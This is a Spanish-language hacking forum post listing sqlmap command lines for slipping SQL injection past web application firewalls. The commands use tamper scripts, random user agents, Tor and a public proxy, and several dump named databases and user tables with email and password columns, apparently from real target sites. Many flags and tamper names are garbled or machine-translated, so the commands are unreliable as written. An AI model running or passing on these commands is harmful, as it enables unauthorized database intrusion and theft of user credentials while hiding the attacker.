Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
BYPASS WAF SQLMAP POR UFO OWO ?
#1
Exclamation 
Hola chicos en esta oportunidad voy a hacer un pequeño post , para hacer una evasión de WAF , que a veces son un poquito molestos ?, dejare una serie de comandos para hacer una inyección sql y hacer un poquito de magia.
Disfrutenlo.  Angel Angel

Si no has entendido en un comando ponte a estudiar vagos   -Lofiu?

--level = 5 --risk = 3 --random-agent --user-agent -v3 --batch --threads = 10 --dbs



--dbms = "MySQL" -v3 --technique U --tamper = "space2mysqlblank.py" --dbs



--dbms = "MySQL" -v3 --technique U --tamper = "space2comment" --dbs



-v3 --technique = T --no-cast --fresh-queries --banner



sqlmap -u http: //www.********? id = 1 --level 2 --risk 3 --batch --dbs



  Sad Big Grin Cool



 



-f -b - usuario actual --current-db --is-dba --users --dbs



 



--risk = 3 --level = 5 --random-agent --user-agent -v3 --batch --threads = 10 --dbs



 



--risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs



 



--random-agent --dbms = MYSQL --dbs --technique = B "



 



--identificar-waf - agente-aleatorio -v 3 --dbs



 



1: --identify-waf --random-agent -v 3 --tamper = "between, randomcase, space2comment" --dbs



2: --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level = 5 --risk = 3



 



--threads = 10 --dbms = MYSQL --tamper = apostrophemask --technique = E -D joomlab -T anz91_session -C session_id --dump



 



--tables -D miss_db --is-dba --threads = "10" --time-sec = 10 --timeout = 5 --no-cast --tamper = entre, modsecurityverde, modsecurityzeroversioned, charencode, mayor - identificar-waf - agente-aleatorio



 



sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"



 



--banner --safe-url = 2 --safe-freq = 3 --tamper = between, randomcase, charencode -v 3 --force-ssl --dbs --threads = 10 --level = 2 --risk = 2



-v3 --dbms = "MySQL" --risk = 3 --level = 3 --technique = BU --tamper = "space2mysqlblank.py" --random-agent -D damksa_abr -T admin, jobadmin, member - colu



 







 



--level = 5 --risk = 3 --random-agent --tamper = between, charencode, charunicodeencode, equaltolike, maximum, multiplespaces, no recursivereplacement, porcentaje, randomcase, securesphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqashash , space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = entre, bluecoat, charencode, charunicodeencode, concat2concatws, equaltolike, más grande, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentaje, randomcase, securesphere, space2comment, space2hash, space2morehash, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords, xforwardedfor --dbms = mssql



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = between, charencode, charunicodeencode, equaltolike, maximum, multiplespaces, nonreursursereplacement, percent, randomcase, seguresphere, sp_password, space2comment, space2dash, space2mssqlblank, space2mysqldash, space2plus, space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



sqlmap.py -url www.site.ps/index.php --level 5 --risk 3 tamper = apostrophemask, apostrophenullencode, base64encode, entre, chardoubleencode, charencode, charunicodeencecerequeech randomcase, securesphere, space2comment, space2plus, space2randomblank, unionalltounion, unmagicquotes --dbms = mssql



 



 



--level = 5 --risk = 3 -p "id" –-tamper = "apostrophemask, apostrophenullencode, appendnullbyte, base64encode, bluecoat, chardoubleencode, charcodeuccescontentaciones de las personas modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentajes, randomcase, randomcomments, securesphere, space2comment, space2hash, space2morehash, space2aspingsas_aspachas de la vida



 



sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' –level = 5 –risk = 3 -p 'item1' –tamper = apostrophemask, apostrophenullencode, appendnullbyte, base64encode, entre, bluecoat, chardoubleencode, charencode, charunicodeencode, concat2concatws, equaltolike, más grande, halfversionedmorekeywords, ifnull2ifisnull, modsecurityversioned, modsecurityzeroversioned, multiplespaces, nonrecursivereplacement, porcentaje, randomcase, randomcomments, SecureSphere, space2comment, space2dash, space2hash, space2morehash, space2mssqlblank, space2mssqlhash, space2mysqlblank, space2mysqldash, space2plus, space2randomblank, sp_password, unionalltounion, unmagicquotes, versionedkeywords, versionedmorekeywords



 



  Tongue



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - -mesas



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - T "edt_usuarios" --columnas



 



--tamper "randomcase.py" --tor --tor-type = SOCKS5 --tor-port = 9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" - T "edt_usuarios" -C "ud, email, usuario, contra" --dump



 


tamper = between.py, charencode.py, charunicodeencode.py, equaltolike.py, greatest.py, multiplespaces.py, nonrecursivereplacement.py, percent.py, randomcase.py, securesphere.py, sp_password.py, space2comment.py, space2dash.py, space2mssqlblank.py, space2mysqldash.py, space2plus.py, space2randomblank.py, unionalltounion.py, unmagicquotes.py --dbms = mssql


Forum Jump:


Users browsing this thread: 1 Guest(s)